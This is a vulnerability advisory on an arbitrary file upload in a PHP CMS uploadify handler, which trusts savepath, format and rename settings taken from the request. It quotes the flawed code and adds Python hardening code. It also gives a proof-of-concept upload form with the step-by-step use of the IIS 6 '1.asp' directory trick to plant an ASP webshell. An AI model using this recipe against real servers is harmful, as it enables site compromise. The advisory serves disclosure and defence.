- Published: 2017-01-02
- Disclosed: N/A
- Vulnerability type: file upload
- Severity: high
- Vulnerability ID: xianzhi-2017-01-73318655
- Tested version: N/A
Vulnerability details

app/system/include/module/uploadify.class.php, line 65:
```php
public function doupfile(){
    global $_M;   // $_M['form'] holds the merged request parameters
    $this->upfile->set_upfile();
    // Every upload setting is taken from the request, not from server config
    $info['savepath']     = $_M['form']['savepath'];      // attacker-controlled target directory
    $info['format']       = $_M['form']['format'];        // attacker-controlled extension whitelist
    $info['maxsize']      = $_M['form']['maxsize'];       // attacker-controlled size limit
    $info['is_rename']    = $_M['form']['is_rename'];     // 0 keeps the original file name
    $info['is_overwrite'] = $_M['form']['is_overwrite'];
    $this->set_upload($info);
    $back = $this->upload($_M['form']['formname']);
    if($_M['form']['type']==1){
        if($back['error']){
            $back['error'] = $back['errorcode'];
        }else{
            $backs['path'] = $back['path'];
            $backs['append'] = 'false';
            $back = $backs;
        }
    }
    echo jsonencode($back);   // the response includes the stored path
}
```
`$_M['form']` is populated from `$_POST`, `$_GET` and `$_COOKIE`, so every value read above is attacker-controlled: the extension whitelist (`format`), the size limit (`maxsize`), whether the file is renamed, and in particular the target directory (`savepath`).

Because `savepath` is attacker-controlled and the directory is created automatically when it does not exist, an attacker can have the file stored under a directory named like `1.asp`. On IIS 6 every file inside a directory whose name ends in `.asp` is handed to the ASP engine regardless of its own extension, so an uploaded `.jpg` containing ASP code is executed (the IIS 6 directory parsing vulnerability), giving a webshell.
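To make the failure concrete, the block below is an added illustration and not MetInfo's code: it models in Python the `savepath` and `format` handling the report describes next to a hardened version. `UPLOAD_ROOT`, the whitelists and all function names are hypothetical; only the failure modes come from the report (the directory and extension list come from the request, the directory is created if missing, and on IIS 6 a directory named `1.asp` makes every file inside run as ASP).

```python
"""
Added illustration, not MetInfo's code: a Python model of the savepath and
format handling the report describes, next to a hardened version.

Everything here is hypothetical (UPLOAD_ROOT, the whitelists, the function
names); only the failure modes come from the report: savepath is taken
from the request, the directory is created if missing, and on IIS 6 a
directory named like "1.asp" makes every file inside run as ASP.
"""
import posixpath
import secrets

# Hypothetical server-side settings. The reported handler instead reads
# savepath, format and maxsize from the request, which is the bug.
UPLOAD_ROOT = "upload"
ALLOWED_SAVEPATHS = {"images", "attachments"}
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "zip", "rar", "pdf", "doc"}
# Directory suffixes IIS 6 maps to the ASP engine: "x.asp/shell.jpg" runs as ASP.
IIS6_EXEC_DIR_EXTS = {".asp", ".asa", ".cer", ".cdx"}


def vulnerable_target_dir(root, savepath):
    """Mirror of the reported behaviour: trust the client's savepath and join
    it onto the upload root (the real handler then creates that directory)."""
    return posixpath.join(root, savepath)


def safe_target_dir(root, savepath):
    """Hardened counterpart. Returns the target directory or raises ValueError.
    The whitelist alone would be enough; the earlier checks name each attack."""
    if not savepath or "\x00" in savepath or "\\" in savepath:
        raise ValueError("malformed savepath")
    norm = posixpath.normpath(savepath)
    if norm.startswith("/") or norm == ".." or norm.startswith("../"):
        raise ValueError("savepath escapes the upload root")
    for part in norm.split("/"):
        ext = posixpath.splitext(part)[1].lower()
        if ext in IIS6_EXEC_DIR_EXTS:
            raise ValueError("directory %r would be executed as script by IIS 6" % part)
    if norm not in ALLOWED_SAVEPATHS:
        raise ValueError("savepath %r is not a configured upload directory" % norm)
    return posixpath.join(root, norm)


def safe_filename(filename, allowed_exts=ALLOWED_EXTS):
    """Server-side extension check that ignores any client-supplied `format`.
    Also drops directory parts and rejects the IIS 6 "shell.asp;.jpg" trick."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or ";" in base or "\x00" in base or "." not in base:
        raise ValueError("malformed filename %r" % filename)
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in allowed_exts:
        raise ValueError("extension %r not allowed" % ext)
    return base


def stored_name(filename, token=None):
    """Always rename on disk (the PoC sends is_rename=0 to keep its own name),
    so the attacker controls neither the directory nor the stored file name."""
    ext = safe_filename(filename).rsplit(".", 1)[1].lower()
    return "%s.%s" % (token or secrets.token_hex(8), ext)


def reason_rejected(fn, *args):
    """Return the rejection message for fn(*args), or None if it is accepted."""
    try:
        fn(*args)
    except ValueError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    for sp in ("images", "1.asp", "../etc", "images/x.cer"):
        print("%-14s vulnerable -> %-22s hardened -> %s" % (
            sp, vulnerable_target_dir(UPLOAD_ROOT, sp),
            reason_rejected(safe_target_dir, UPLOAD_ROOT, sp) or "accepted"))
```

The point of the hardened functions is that none of the five request fields the handler reads need to exist at all: the target directory, the extension list, the size limit and the rename policy all belong in server-side configuration, and the stored name should be generated so that neither the directory nor the file name the attacker chose ever reaches the filesystem.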
Test method

```html
<form id="form" action="http://xxxxx.com/app/system/entrance.php?c=uploadify&a=doupfile" method="POST" enctype="multipart/form-data">
savepath:<input type="text" name="savepath" value="1.asp"><br />
format:<input type="text" name="format" value="rar|zip|sql|doc|pdf|jpg|xls|png|gif|mp3|jpeg|bmp|swf|flv|ico"><br />
maxsize:<input type="text" name="maxsize" value="1111111111111111"><br />
is_rename:<input type="text" name="is_rename" value="0"><br />
is_overwrite:<input type="text" name="is_overwrite" value="1"><br />
formname:<input type="text" name="formname" value="file"><br />
<input type="file" name="file">
<input type="submit" value="submit">
</form>
```
Choose a webshell whose extension is in the `format` list above (for example a `.jpg` containing ASP code) and submit; because `savepath` is `1.asp`, the file lands in a `1.asp` directory that IIS 6 executes as ASP.

The response contains the stored path, which can be used directly.

(Screenshot: view.png)